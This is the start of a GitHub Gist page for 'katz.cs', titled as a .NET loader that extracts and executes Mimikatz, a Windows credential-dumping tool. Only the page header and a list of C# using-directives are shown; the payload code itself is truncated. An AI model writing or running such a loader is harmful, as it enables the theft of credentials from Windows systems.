Skip to content

Instantly share code, notes, and snippets.

@d0ub1ec0d3
d0ub1ec0d3 / katz.cs
Created August 16, 2019 07:02 — forked from Ridter/katz.cs
.NET 2.0.50727 Mimikatz Extract and Execute -
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Security.Cryptography;